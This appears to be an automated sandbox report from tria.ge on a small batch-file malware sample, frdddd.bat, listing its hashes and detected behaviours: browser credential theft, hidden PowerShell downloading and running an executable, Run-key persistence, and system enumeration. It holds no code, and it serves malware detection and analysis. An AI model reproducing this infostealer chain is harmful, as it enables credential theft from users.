Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    frdddd.bat

  • Size

    255B

  • Sample

    240726-wde6lathkk

  • MD5

    7cfc0e137d5d8b7f808add077083360b

  • SHA1

    af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9

  • SHA256

    596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5

  • SHA512

    9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0

Malware Config

Targets

    • Target

      frdddd.bat

    • Size

      255B

    • MD5

      7cfc0e137d5d8b7f808add077083360b

    • SHA1

      af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9

    • SHA256

      596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5

    • SHA512

      9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0

    • Credentials from Password Stores: Credentials from Web Browsers

      Malicious Access or copy of Web Browser Credential store.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Enumerates processes with tasklist

MITRE ATT&CK Enterprise v15

Tasks